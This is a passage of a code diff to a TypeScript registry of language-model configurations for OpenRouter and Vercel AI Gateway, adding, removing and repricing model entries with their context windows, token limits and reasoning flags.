 				cacheWrite: 0,
 			},
 			contextWindow: 32768,
@@ -8117,6 +8099,23 @@ export const MODELS = {
 			contextWindow: 32768,
 			maxTokens: 16384,
 		} satisfies Model<"openai-completions">,
+		"mistralai/mistral-small-2603": {
+			id: "mistralai/mistral-small-2603",
+			name: "Mistral: Mistral Small 4",
+			api: "openai-completions",
+			provider: "openrouter",
+			baseUrl: "https://openrouter.ai/api/v1",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 0.15,
+				output: 0.6,
+				cacheRead: 0.015,
+				cacheWrite: 0,
+			},
+			contextWindow: 262144,
+			maxTokens: 4096,
+		} satisfies Model<"openai-completions">,
 		"mistralai/mistral-small-3.1-24b-instruct:free": {
 			id: "mistralai/mistral-small-3.1-24b-instruct:free",
 			name: "Mistral: Mistral Small 3.1 24B (free)",
@@ -8143,13 +8142,13 @@ export const MODELS = {
 			reasoning: false,
 			input: ["text", "image"],
 			cost: {
-				input: 0.06,
-				output: 0.18,
-				cacheRead: 0.03,
+				input: 0.075,
+				output: 0.19999999999999998,
+				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 131072,
-			maxTokens: 131072,
+			contextWindow: 128000,
+			maxTokens: 4096,
 		} satisfies Model<"openai-completions">,
 		"mistralai/mistral-small-creative": {
 			id: "mistralai/mistral-small-creative",
@@ -8162,7 +8161,7 @@ export const MODELS = {
 			cost: {
 				input: 0.09999999999999999,
 				output: 0.3,
-				cacheRead: 0,
+				cacheRead: 0.01,
 				cacheWrite: 0,
 			},
 			contextWindow: 32768,
@@ -8179,7 +8178,7 @@ export const MODELS = {
 			cost: {
 				input: 2,
 				output: 6,
-				cacheRead: 0,
+				cacheRead: 0.19999999999999998,
 				cacheWrite: 0,
 			},
 			contextWindow: 65536,
@@ -8213,7 +8212,7 @@ export const MODELS = {
 			cost: {
 				input: 2,
 				output: 6,
-				cacheRead: 0,
+				cacheRead: 0.19999999999999998,
 				cacheWrite: 0,
 			},
 			contextWindow: 131072,
@@ -8230,7 +8229,7 @@ export const MODELS = {
 			cost: {
 				input: 0.09999999999999999,
 				output: 0.3,
-				cacheRead: 0,
+				cacheRead: 0.01,
 				cacheWrite: 0,
 			},
 			contextWindow: 32000,
@@ -8270,23 +8269,6 @@ export const MODELS = {
 			contextWindow: 131072,
 			maxTokens: 4096,
 		} satisfies Model<"openai-completions">,
-		"moonshotai/kimi-k2-0905:exacto": {
-			id: "moonshotai/kimi-k2-0905:exacto",
-			name: "MoonshotAI: Kimi K2 0905 (exacto)",
-			api: "openai-completions",
-			provider: "openrouter",
-			baseUrl: "https://openrouter.ai/api/v1",
-			reasoning: false,
-			input: ["text"],
-			cost: {
-				input: 0.6,
-				output: 2.5,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 262144,
-			maxTokens: 4096,
-		} satisfies Model<"openai-completions">,
 		"moonshotai/kimi-k2-thinking": {
 			id: "moonshotai/kimi-k2-thinking",
 			name: "MoonshotAI: Kimi K2 Thinking",
@@ -8406,6 +8388,40 @@ export const MODELS = {
 			contextWindow: 256000,
 			maxTokens: 4096,
 		} satisfies Model<"openai-completions">,
+		"nvidia/nemotron-3-super-120b-a12b": {
+			id: "nvidia/nemotron-3-super-120b-a12b",
+			name: "NVIDIA: Nemotron 3 Super",
+			api: "openai-completions",
+			provider: "openrouter",
+			baseUrl: "https://openrouter.ai/api/v1",
+			reasoning: true,
+			input: ["text"],
+			cost: {
+				input: 0.09999999999999999,
+				output: 0.5,
+				cacheRead: 0.04,
+				cacheWrite: 0,
+			},
+			contextWindow: 262144,
+			maxTokens: 4096,
+		} satisfies Model<"openai-completions">,
+		"nvidia/nemotron-3-super-120b-a12b:free": {
+			id: "nvidia/nemotron-3-super-120b-a12b:free",
+			name: "NVIDIA: Nemotron 3 Super (free)",
+			api: "openai-completions",
+			provider: "openrouter",
+			baseUrl: "https://openrouter.ai/api/v1",
+			reasoning: true,
+			input: ["text"],
+			cost: {
+				input: 0,
+				output: 0,
+				cacheRead: 0,
+				cacheWrite: 0,
+			},
+			contextWindow: 262144,
+			maxTokens: 262144,
+		} satisfies Model<"openai-completions">,
 		"nvidia/nemotron-nano-12b-v2-vl:free": {
 			id: "nvidia/nemotron-nano-12b-v2-vl:free",
 			name: "NVIDIA: Nemotron Nano 12B 2 VL (free)",
@@ -9103,6 +9119,40 @@ export const MODELS = {
 			contextWindow: 1050000,
 			maxTokens: 128000,
 		} satisfies Model<"openai-completions">,
+		"openai/gpt-5.4-mini": {
+			id: "openai/gpt-5.4-mini",
+			name: "OpenAI: GPT-5.4 Mini",
+			api: "openai-completions",
+			provider: "openrouter",
+			baseUrl: "https://openrouter.ai/api/v1",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 0.75,
+				output: 4.5,
+				cacheRead: 0.075,
+				cacheWrite: 0,
+			},
+			contextWindow: 400000,
+			maxTokens: 128000,
+		} satisfies Model<"openai-completions">,
+		"openai/gpt-5.4-nano": {
+			id: "openai/gpt-5.4-nano",
+			name: "OpenAI: GPT-5.4 Nano",
+			api: "openai-completions",
+			provider: "openrouter",
+			baseUrl: "https://openrouter.ai/api/v1",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 0.19999999999999998,
+				output: 1.25,
+				cacheRead: 0.02,
+				cacheWrite: 0,
+			},
+			contextWindow: 400000,
+			maxTokens: 128000,
+		} satisfies Model<"openai-completions">,
 		"openai/gpt-5.4-pro": {
 			id: "openai/gpt-5.4-pro",
 			name: "OpenAI: GPT-5.4 Pro",
@@ -9137,23 +9187,6 @@ export const MODELS = {
 			contextWindow: 131072,
 			maxTokens: 4096,
 		} satisfies Model<"openai-completions">,
-		"openai/gpt-oss-120b:exacto": {
-			id: "openai/gpt-oss-120b:exacto",
-			name: "OpenAI: gpt-oss-120b (exacto)",
-			api: "openai-completions",
-			provider: "openrouter",
-			baseUrl: "https://openrouter.ai/api/v1",
-			reasoning: true,
-			input: ["text"],
-			cost: {
-				input: 0.039,
-				output: 0.19,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 131072,
-			maxTokens: 4096,
-		} satisfies Model<"openai-completions">,
 		"openai/gpt-oss-120b:free": {
 			id: "openai/gpt-oss-120b:free",
 			name: "OpenAI: gpt-oss-120b (free)",
@@ -9181,12 +9214,12 @@ export const MODELS = {
 			input: ["text"],
 			cost: {
 				input: 0.03,
-				output: 0.14,
-				cacheRead: 0,
+				output: 0.11,
+				cacheRead: 0.015,
 				cacheWrite: 0,
 			},
 			contextWindow: 131072,
-			maxTokens: 4096,
+			maxTokens: 131072,
 		} satisfies Model<"openai-completions">,
 		"openai/gpt-oss-20b:free": {
 			id: "openai/gpt-oss-20b:free",
@@ -9228,7 +9261,7 @@ export const MODELS = {
 			api: "openai-completions",
 			provider: "openrouter",
 			baseUrl: "https://openrouter.ai/api/v1",
-			reasoning: false,
+			reasoning: true,
 			input: ["text", "image"],
 			cost: {
 				input: 15,
@@ -9279,7 +9312,7 @@ export const MODELS = {
 			api: "openai-completions",
 			provider: "openrouter",
 			baseUrl: "https://openrouter.ai/api/v1",
-			reasoning: false,
+			reasoning: true,
 			input: ["text"],
 			cost: {
 				input: 1.1,
@@ -9296,7 +9329,7 @@ export const MODELS = {
 			api: "openai-completions",
 			provider: "openrouter",
 			baseUrl: "https://openrouter.ai/api/v1",
-			reasoning: false,
+			reasoning: true,
 			input: ["text"],
 			cost: {
 				input: 1.1,
@@ -9486,9 +9519,9 @@ export const MODELS = {
 			reasoning: false,
 			input: ["text"],
 			cost: {
-				input: 0.39999999999999997,
-				output: 1.2,
-				cacheRead: 0.08,
+				input: 0.26,
+				output: 0.78,
+				cacheRead: 0.052000000000000005,
 				cacheWrite: 0,
 			},
 			contextWindow: 1000000,
@@ -9554,8 +9587,8 @@ export const MODELS = {
 			reasoning: false,
 			input: ["text", "image"],
 			cost: {
-				input: 0.7999999999999999,
-				output: 3.1999999999999997,
+				input: 0.52,
+				output: 2.08,
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
@@ -9622,13 +9655,13 @@ export const MODELS = {
 			reasoning: true,
 			input: ["text"],
 			cost: {
-				input: 0.11,
-				output: 0.6,
-				cacheRead: 0.055,
+				input: 0.14950000000000002,
+				output: 1.495,
+				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 262144,
-			maxTokens: 262144,
+			contextWindow: 131072,
+			maxTokens: 4096,
 		} satisfies Model<"openai-completions">,
 		"qwen/qwen3-30b-a3b": {
 			id: "qwen/qwen3-30b-a3b",
@@ -9673,13 +9706,13 @@ export const MODELS = {
 			reasoning: true,
 			input: ["text"],
 			cost: {
-				input: 0.051,
-				output: 0.33999999999999997,
-				cacheRead: 0,
+				input: 0.08,
+				output: 0.39999999999999997,
+				cacheRead: 0.08,
 				cacheWrite: 0,
 			},
-			contextWindow: 32768,
-			maxTokens: 4096,
+			contextWindow: 131072,
+			maxTokens: 131072,
 		} satisfies Model<"openai-completions">,
 		"qwen/qwen3-32b": {
 			id: "qwen/qwen3-32b",
@@ -9817,23 +9850,6 @@ export const MODELS = {
 			contextWindow: 1000000,
 			maxTokens: 65536,
 		} satisfies Model<"openai-completions">,
-		"qwen/qwen3-coder:exacto": {
-			id: "qwen/qwen3-coder:exacto",
-			name: "Qwen: Qwen3 Coder 480B A35B (exacto)",
-			api: "openai-completions",
-			provider: "openrouter",
-			baseUrl: "https://openrouter.ai/api/v1",
-			reasoning: false,
-			input: ["text"],
-			cost: {
-				input: 0.22,
-				output: 1.7999999999999998,
-				cacheRead: 0.022,
-				cacheWrite: 0,
-			},
-			contextWindow: 262144,
-			maxTokens: 65536,
-		} satisfies Model<"openai-completions">,
 		"qwen/qwen3-coder:free": {
 			id: "qwen/qwen3-coder:free",
 			name: "Qwen: Qwen3 Coder 480B A35B (free)",
@@ -9860,9 +9876,9 @@ export const MODELS = {
 			reasoning: false,
 			input: ["text"],
 			cost: {
-				input: 1.2,
-				output: 6,
-				cacheRead: 0.24,
+				input: 0.78,
+				output: 3.9,
+				cacheRead: 0.156,
 				cacheWrite: 0,
 			},
 			contextWindow: 262144,
@@ -9928,13 +9944,13 @@ export const MODELS = {
 			reasoning: true,
 			input: ["text"],
 			cost: {
-				input: 0.15,
-				output: 1.2,
+				input: 0.0975,
+				output: 0.78,
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 128000,
-			maxTokens: 4096,
+			contextWindow: 131072,
+			maxTokens: 32768,
 		} satisfies Model<"openai-completions">,
 		"qwen/qwen3-vl-235b-a22b-instruct": {
 			id: "qwen/qwen3-vl-235b-a22b-instruct",
@@ -9962,8 +9978,8 @@ export const MODELS = {
 			reasoning: true,
 			input: ["text", "image"],
 			cost: {
-				input: 0,
-				output: 0,
+				input: 0.26,
+				output: 2.6,
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
@@ -9996,8 +10012,8 @@ export const MODELS = {
 			reasoning: true,
 			input: ["text", "image"],
 			cost: {
-				input: 0,
-				output: 0,
+				input: 0.13,
+				output: 1.56,
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
@@ -10123,6 +10139,23 @@ export const MODELS = {
 			contextWindow: 262144,
 			maxTokens: 65536,
 		} satisfies Model<"openai-completions">,
+		"qwen/qwen3.5-9b": {
+			id: "qwen/qwen3.5-9b",
+			name: "Qwen: Qwen3.5-9B",
+			api: "openai-completions",
+			provider: "openrouter",
+			baseUrl: "https://openrouter.ai/api/v1",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 0.049999999999999996,
+				output: 0.15,
+				cacheRead: 0,
+				cacheWrite: 0,
+			},
+			contextWindow: 256000,
+			maxTokens: 4096,
+		} satisfies Model<"openai-completions">,
 		"qwen/qwen3.5-flash-02-23": {
 			id: "qwen/qwen3.5-flash-02-23",
 			name: "Qwen: Qwen3.5-Flash",
@@ -10132,8 +10165,8 @@ export const MODELS = {
 			reasoning: true,
 			input: ["text", "image"],
 			cost: {
-				input: 0.09999999999999999,
-				output: 0.39999999999999997,
+				input: 0.065,
+				output: 0.26,
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
@@ -10167,12 +10200,12 @@ export const MODELS = {
 			input: ["text"],
 			cost: {
 				input: 0.15,
-				output: 0.39999999999999997,
+				output: 0.58,
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 32768,
-			maxTokens: 32768,
+			contextWindow: 131072,
+			maxTokens: 131072,
 		} satisfies Model<"openai-completions">,
 		"relace/relace-search": {
 			id: "relace/relace-search",
@@ -10217,13 +10250,13 @@ export const MODELS = {
 			reasoning: false,
 			input: ["text"],
 			cost: {
-				input: 0.65,
-				output: 0.75,
+				input: 0.85,
+				output: 0.85,
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 32768,
-			maxTokens: 32768,
+			contextWindow: 131072,
+			maxTokens: 16384,
 		} satisfies Model<"openai-completions">,
 		"stepfun/step-3.5-flash": {
 			id: "stepfun/step-3.5-flash",
@@ -10302,9 +10335,9 @@ export const MODELS = {
 			reasoning: true,
 			input: ["text"],
 			cost: {
-				input: 0.25,
-				output: 0.85,
-				cacheRead: 0.125,
+				input: 0.3,
+				output: 1.1,
+				cacheRead: 0.15,
 				cacheWrite: 0,
 			},
 			contextWindow: 163840,
@@ -10446,6 +10479,23 @@ export const MODELS = {
 			contextWindow: 2000000,
 			maxTokens: 30000,
 		} satisfies Model<"openai-completions">,
+		"x-ai/grok-4.20-beta": {
+			id: "x-ai/grok-4.20-beta",
+			name: "xAI: Grok 4.20 Beta",
+			api: "openai-completions",
+			provider: "openrouter",
+			baseUrl: "https://openrouter.ai/api/v1",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 2,
+				output: 6,
+				cacheRead: 0.19999999999999998,
+				cacheWrite: 0,
+			},
+			contextWindow: 2000000,
+			maxTokens: 4096,
+		} satisfies Model<"openai-completions">,
 		"x-ai/grok-code-fast-1": {
 			id: "x-ai/grok-code-fast-1",
 			name: "xAI: Grok Code Fast 1",
@@ -10480,6 +10530,40 @@ export const MODELS = {
 			contextWindow: 262144,
 			maxTokens: 65536,
 		} satisfies Model<"openai-completions">,
+		"xiaomi/mimo-v2-omni": {
+			id: "xiaomi/mimo-v2-omni",
+			name: "Xiaomi: MiMo-V2-Omni",
+			api: "openai-completions",
+			provider: "openrouter",
+			baseUrl: "https://openrouter.ai/api/v1",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 0.39999999999999997,
+				output: 2,
+				cacheRead: 0.08,
+				cacheWrite: 0,
+			},
+			contextWindow: 262144,
+			maxTokens: 65536,
+		} satisfies Model<"openai-completions">,
+		"xiaomi/mimo-v2-pro": {
+			id: "xiaomi/mimo-v2-pro",
+			name: "Xiaomi: MiMo-V2-Pro",
+			api: "openai-completions",
+			provider: "openrouter",
+			baseUrl: "https://openrouter.ai/api/v1",
+			reasoning: true,
+			input: ["text"],
+			cost: {
+				input: 1,
+				output: 3,
+				cacheRead: 0.19999999999999998,
+				cacheWrite: 0,
+			},
+			contextWindow: 1048576,
+			maxTokens: 131072,
+		} satisfies Model<"openai-completions">,
 		"z-ai/glm-4-32b": {
 			id: "z-ai/glm-4-32b",
 			name: "Z.ai: GLM 4 32B ",
@@ -10582,23 +10666,6 @@ export const MODELS = {
 			contextWindow: 204800,
 			maxTokens: 204800,
 		} satisfies Model<"openai-completions">,
-		"z-ai/glm-4.6:exacto": {
-			id: "z-ai/glm-4.6:exacto",
-			name: "Z.ai: GLM 4.6 (exacto)",
-			api: "openai-completions",
-			provider: "openrouter",
-			baseUrl: "https://openrouter.ai/api/v1",
-			reasoning: true,
-			input: ["text"],
-			cost: {
-				input: 0.44,
-				output: 1.76,
-				cacheRead: 0.11,
-				cacheWrite: 0,
-			},
-			contextWindow: 204800,
-			maxTokens: 131072,
-		} satisfies Model<"openai-completions">,
 		"z-ai/glm-4.6v": {
 			id: "z-ai/glm-4.6v",
 			name: "Z.ai: GLM 4.6V",
@@ -10625,13 +10692,13 @@ export const MODELS = {
 			reasoning: true,
 			input: ["text"],
 			cost: {
-				input: 0.38,
-				output: 1.9800000000000002,
-				cacheRead: 0.19,
+				input: 0.39,
+				output: 1.75,
+				cacheRead: 0.195,
 				cacheWrite: 0,
 			},
 			contextWindow: 202752,
-			maxTokens: 4096,
+			maxTokens: 65535,
 		} satisfies Model<"openai-completions">,
 		"z-ai/glm-4.7-flash": {
 			id: "z-ai/glm-4.7-flash",
@@ -10664,8 +10731,25 @@ export const MODELS = {
 				cacheRead: 0.119,
 				cacheWrite: 0,
 			},
+			contextWindow: 80000,
+			maxTokens: 131072,
+		} satisfies Model<"openai-completions">,
+		"z-ai/glm-5-turbo": {
+			id: "z-ai/glm-5-turbo",
+			name: "Z.ai: GLM 5 Turbo",
+			api: "openai-completions",
+			provider: "openrouter",
+			baseUrl: "https://openrouter.ai/api/v1",
+			reasoning: true,
+			input: ["text"],
+			cost: {
+				input: 0.96,
+				output: 3.1999999999999997,
+				cacheRead: 0.192,
+				cacheWrite: 0,
+			},
 			contextWindow: 202752,
-			maxTokens: 4096,
+			maxTokens: 131072,
 		} satisfies Model<"openai-completions">,
 	},
 	"vercel-ai-gateway": {
@@ -10678,7 +10762,7 @@ export const MODELS = {
 			reasoning: true,
 			input: ["text"],
 			cost: {
-				input: 0.06,
+				input: 0.12,
 				output: 0.24,
 				cacheRead: 0,
 				cacheWrite: 0,
@@ -10729,13 +10813,13 @@ export const MODELS = {
 			reasoning: true,
 			input: ["text"],
 			cost: {
-				input: 0.09999999999999999,
-				output: 0.3,
-				cacheRead: 0,
+				input: 0.29,
+				output: 0.59,
+				cacheRead: 0.145,
 				cacheWrite: 0,
 			},
-			contextWindow: 40960,
-			maxTokens: 16384,
+			contextWindow: 131072,
+			maxTokens: 40960,
 		} satisfies Model<"anthropic-messages">,
 		"alibaba/qwen3-235b-a22b-thinking": {
 			id: "alibaba/qwen3-235b-a22b-thinking",
@@ -10746,9 +10830,9 @@ export const MODELS = {
 			reasoning: true,
 			input: ["text", "image"],
 			cost: {
-				input: 0.3,
-				output: 2.9000000000000004,
-				cacheRead: 0,
+				input: 0.22999999999999998,
+				output: 2.3,
+				cacheRead: 0.19999999999999998,
 				cacheWrite: 0,
 			},
 			contextWindow: 262114,
@@ -10765,7 +10849,7 @@ export const MODELS = {
 			cost: {
 				input: 0.39999999999999997,
 				output: 1.5999999999999999,
-				cacheRead: 0,
+				cacheRead: 0.022,
 				cacheWrite: 0,
 			},
 			contextWindow: 262144,
@@ -10780,13 +10864,13 @@ export const MODELS = {
 			reasoning: true,
 			input: ["text"],
 			cost: {
-				input: 0.07,
-				output: 0.27,
+				input: 0.15,
+				output: 0.6,
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 160000,
-			maxTokens: 32768,
+			contextWindow: 262144,
+			maxTokens: 8192,
 		} satisfies Model<"anthropic-messages">,
 		"alibaba/qwen3-coder-next": {
 			id: "alibaba/qwen3-coder-next",
@@ -10794,7 +10878,7 @@ export const MODELS = {
 			api: "anthropic-messages",
 			provider: "vercel-ai-gateway",
 			baseUrl: "https://ai-gateway.vercel.sh",
-			reasoning: true,
+			reasoning: false,
 			input: ["text"],
 			cost: {
 				input: 0.5,
@@ -10822,6 +10906,23 @@ export const MODELS = {
 			contextWindow: 1000000,
 			maxTokens: 65536,
 		} satisfies Model<"anthropic-messages">,
+		"alibaba/qwen3-max": {
+			id: "alibaba/qwen3-max",
+			name: "Qwen3 Max",
+			api: "anthropic-messages",
+			provider: "vercel-ai-gateway",
+			baseUrl: "https://ai-gateway.vercel.sh",
+			reasoning: false,
+			input: ["text"],
+			cost: {
+				input: 1.2,
+				output: 6,
+				cacheRead: 0.24,
+				cacheWrite: 0,
+			},
+			contextWindow: 262144,
+			maxTokens: 32768,
+		} satisfies Model<"anthropic-messages">,
 		"alibaba/qwen3-max-preview": {
 			id: "alibaba/qwen3-max-preview",
 			name: "Qwen3 Max Preview",
@@ -10969,8 +11070,8 @@ export const MODELS = {
 			cost: {
 				input: 3,
 				output: 15,
-				cacheRead: 0,
-				cacheWrite: 0,
+				cacheRead: 0.3,
+				cacheWrite: 3.75,
 			},
 			contextWindow: 200000,
 			maxTokens: 8192,
@@ -11179,6 +11280,23 @@ export const MODELS = {
 			contextWindow: 256000,
 			maxTokens: 8000,
 		} satisfies Model<"anthropic-messages">,
+		"deepseek/deepseek-r1": {
+			id: "deepseek/deepseek-r1",
+			name: "DeepSeek-R1",
+			api: "anthropic-messages",
+			provider: "vercel-ai-gateway",
+			baseUrl: "https://ai-gateway.vercel.sh",
+			reasoning: true,
+			input: ["text"],
+			cost: {
+				input: 1.35,
+				output: 5.4,
+				cacheRead: 0,
+				cacheWrite: 0,
+			},
+			contextWindow: 128000,
+			maxTokens: 8192,
+		} satisfies Model<"anthropic-messages">,
 		"deepseek/deepseek-v3": {
 			id: "deepseek/deepseek-v3",
 			name: "DeepSeek V3 0324",
@@ -11205,13 +11323,13 @@ export const MODELS = {
 			reasoning: true,
 			input: ["text"],
 			cost: {
-				input: 0.21,
-				output: 0.7899999999999999,
+				input: 0.5,
+				output: 1.5,
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
 			contextWindow: 163840,
-			maxTokens: 128000,
+			maxTokens: 16384,
 		} satisfies Model<"anthropic-messages">,
 		"deepseek/deepseek-v3.1-terminus": {
 			id: "deepseek/deepseek-v3.1-terminus",
@@ -11224,7 +11342,7 @@ export const MODELS = {
 			cost: {
 				input: 0.27,
 				output: 1,
-				cacheRead: 0,
+				cacheRead: 0.135,
 				cacheWrite: 0,
 			},
 			contextWindow: 131072,
@@ -11239,9 +11357,9 @@ export const MODELS = {
 			reasoning: false,
 			input: ["text"],
 			cost: {
-				input: 0.26,
-				output: 0.38,
-				cacheRead: 0.13,
+				input: 0.28,
+				output: 0.42,
+				cacheRead: 0.028,
 				cacheWrite: 0,
 			},
 			contextWindow: 128000,
@@ -11264,6 +11382,40 @@ export const MODELS = {
 			contextWindow: 128000,
 			maxTokens: 64000,
 		} satisfies Model<"anthropic-messages">,
+		"google/gemini-2.0-flash": {
+			id: "google/gemini-2.0-flash",
+			name: "Gemini 2.0 Flash",
+			api: "anthropic-messages",
+			provider: "vercel-ai-gateway",
+			baseUrl: "https://ai-gateway.vercel.sh",
+			reasoning: false,
+			input: ["text", "image"],
+			cost: {
+				input: 0.15,
+				output: 0.6,
+				cacheRead: 0.024999999999999998,
+				cacheWrite: 0,
+			},
+			contextWindow: 1048576,
+			maxTokens: 8192,
+		} satisfies Model<"anthropic-messages">,
+		"google/gemini-2.0-flash-lite": {
+			id: "google/gemini-2.0-flash-lite",
+			name: "Gemini 2.0 Flash Lite",
+			api: "anthropic-messages",
+			provider: "vercel-ai-gateway",
+			baseUrl: "https://ai-gateway.vercel.sh",
+			reasoning: false,
+			input: ["text", "image"],
+			cost: {
+				input: 0.075,
+				output: 0.3,
+				cacheRead: 0.02,
+				cacheWrite: 0,
+			},
+			contextWindow: 1048576,
+			maxTokens: 8192,
+		} satisfies Model<"anthropic-messages">,
 		"google/gemini-2.5-flash": {
 			id: "google/gemini-2.5-flash",
 			name: "Gemini 2.5 Flash",
@@ -11271,11 +11423,11 @@ export const MODELS = {
 			provider: "vercel-ai-gateway",
 			baseUrl: "https://ai-gateway.vercel.sh",
 			reasoning: true,
-			input: ["text"],
+			input: ["text", "image"],
 			cost: {
 				input: 0.3,
 				output: 2.5,
-				cacheRead: 0,
+				cacheRead: 0.03,
 				cacheWrite: 0,
 			},
 			contextWindow: 1000000,
@@ -11298,40 +11450,6 @@ export const MODELS = {
 			contextWindow: 1048576,
 			maxTokens: 65536,
 		} satisfies Model<"anthropic-messages">,
-		"google/gemini-2.5-flash-lite-preview-09-2025": {
-			id: "google/gemini-2.5-flash-lite-preview-09-2025",
-			name: "Gemini 2.5 Flash Lite Preview 09-2025",
-			api: "anthropic-messages",
-			provider: "vercel-ai-gateway",
-			baseUrl: "https://ai-gateway.vercel.sh",
-			reasoning: true,
-			input: ["text", "image"],
-			cost: {
-				input: 0.09999999999999999,
-				output: 0.39999999999999997,
-				cacheRead: 0.01,
-				cacheWrite: 0,
-			},
-			contextWindow: 1048576,
-			maxTokens: 65536,
-		} satisfies Model<"anthropic-messages">,
-		"google/gemini-2.5-flash-preview-09-2025": {
-			id: "google/gemini-2.5-flash-preview-09-2025",
-			name: "Gemini 2.5 Flash Preview 09-2025",
-			api: "anthropic-messages",
-			provider: "vercel-ai-gateway",
-			baseUrl: "https://ai-gateway.vercel.sh",
-			reasoning: true,
-			input: ["text", "image"],
-			cost: {
-				input: 0.3,
-				output: 2.5,
-				cacheRead: 0.03,
-				cacheWrite: 0,
-			},
-			contextWindow: 1000000,
-			maxTokens: 65536,
-		} satisfies Model<"anthropic-messages">,
 		"google/gemini-2.5-pro": {
 			id: "google/gemini-2.5-pro",
 			name: "Gemini 2.5 Pro",
@@ -11339,11 +11457,11 @@ export const MODELS = {
 			provider: "vercel-ai-gateway",
 			baseUrl: "https://ai-gateway.vercel.sh",
 			reasoning: true,
-			input: ["text"],
+			input: ["text", "image"],
 			cost: {
 				input: 1.25,
 				output: 10,
-				cacheRead: 0,
+				cacheRead: 0.125,
 				cacheWrite: 0,
 			},
 			contextWindow: 1048576,
@@ -11364,7 +11482,7 @@ export const MODELS = {
 				cacheWrite: 0,
 			},
 			contextWindow: 1000000,
-			maxTokens: 64000,
+			maxTokens: 65000,
 		} satisfies Model<"anthropic-messages">,
 		"google/gemini-3-pro-preview": {
 			id: "google/gemini-3-pro-preview",
@@ -11466,7 +11584,7 @@ export const MODELS = {
 				cacheWrite: 0,
 			},
 			contextWindow: 128000,
-			maxTokens: 8192,
+			maxTokens: 100000,
 		} satisfies Model<"anthropic-messages">,
 		"meituan/longcat-flash-thinking": {
 			id: "meituan/longcat-flash-thinking",
@@ -11494,13 +11612,13 @@ export const MODELS = {
 			reasoning: false,
 			input: ["text"],
 			cost: {
-				input: 0.39999999999999997,
-				output: 0.39999999999999997,
+				input: 0.72,
+				output: 0.72,
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 131072,
-			maxTokens: 16384,
+			contextWindow: 128000,
+			maxTokens: 8192,
 		} satisfies Model<"anthropic-messages">,
 		"meta/llama-3.1-8b": {
 			id: "meta/llama-3.1-8b",
@@ -11511,12 +11629,12 @@ export const MODELS = {
 			reasoning: false,
 			input: ["text"],
 			cost: {
-				input: 0.03,
-				output: 0.049999999999999996,
-				cacheRead: 0,
+				input: 0.09999999999999999,
+				output: 0.09999999999999999,
+				cacheRead: 0.09999999999999999,
 				cacheWrite: 0,
 			},
-			contextWindow: 131072,
+			contextWindow: 128000,
 			maxTokens: 16384,
 		} satisfies Model<"anthropic-messages">,
 		"meta/llama-3.2-11b": {
@@ -11579,12 +11697,12 @@ export const MODELS = {
 			reasoning: false,
 			input: ["text", "image"],
 			cost: {
-				input: 0.15,
-				output: 0.6,
+				input: 0.24,
+				output: 0.9700000000000001,
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 131072,
+			contextWindow: 128000,
 			maxTokens: 8192,
 		} satisfies Model<"anthropic-messages">,
 		"meta/llama-4-scout": {
@@ -11596,12 +11714,12 @@ export const MODELS = {
 			reasoning: false,
 			input: ["text", "image"],
 			cost: {
-				input: 0.08,
-				output: 0.3,
+				input: 0.16999999999999998,
+				output: 0.66,
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 131072,
+			contextWindow: 128000,
 			maxTokens: 8192,
 		} satisfies Model<"anthropic-messages">,
 		"minimax/minimax-m2": {
@@ -11632,8 +11750,8 @@ export const MODELS = {
 			cost: {
 				input: 0.3,
 				output: 1.2,
-				cacheRead: 0.15,
-				cacheWrite: 0,
+				cacheRead: 0.03,
+				cacheWrite: 0.375,
 			},
 			contextWindow: 204800,
 			maxTokens: 131072,
@@ -11686,8 +11804,42 @@ export const MODELS = {
 				cacheRead: 0.03,
 				cacheWrite: 0.375,
 			},
-			contextWindow: 4096,
-			maxTokens: 4096,
+			contextWindow: 204800,
+			maxTokens: 131000,
+		} satisfies Model<"anthropic-messages">,
+		"minimax/minimax-m2.7": {
+			id: "minimax/minimax-m2.7",
+			name: "Minimax M2.7",
+			api: "anthropic-messages",
+			provider: "vercel-ai-gateway",
+			baseUrl: "https://ai-gateway.vercel.sh",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 0.3,
+				output: 1.2,
+				cacheRead: 0.06,
+				cacheWrite: 0.375,
+			},
+			contextWindow: 204800,
+			maxTokens: 131000,
+		} satisfies Model<"anthropic-messages">,
+		"minimax/minimax-m2.7-highspeed": {
+			id: "minimax/minimax-m2.7-highspeed",
+			name: "MiniMax M2.7 High Speed",
+			api: "anthropic-messages",
+			provider: "vercel-ai-gateway",
+			baseUrl: "https://ai-gateway.vercel.sh",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 0.6,
+				output: 2.4,
+				cacheRead: 0.06,
+				cacheWrite: 0.375,
+			},
+			contextWindow: 204800,
+			maxTokens: 131100,
 		} satisfies Model<"anthropic-messages">,
 		"mistral/codestral": {
 			id: "mistral/codestral",
@@ -11715,8 +11867,8 @@ export const MODELS = {
 			reasoning: false,
 			input: ["text"],
 			cost: {
-				input: 0,
-				output: 0,
+				input: 0.39999999999999997,
+				output: 2,
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
@@ -11749,8 +11901,8 @@ export const MODELS = {
 			reasoning: false,
 			input: ["text"],
 			cost: {
-				input: 0,
-				output: 0,
+				input: 0.09999999999999999,
+				output: 0.3,
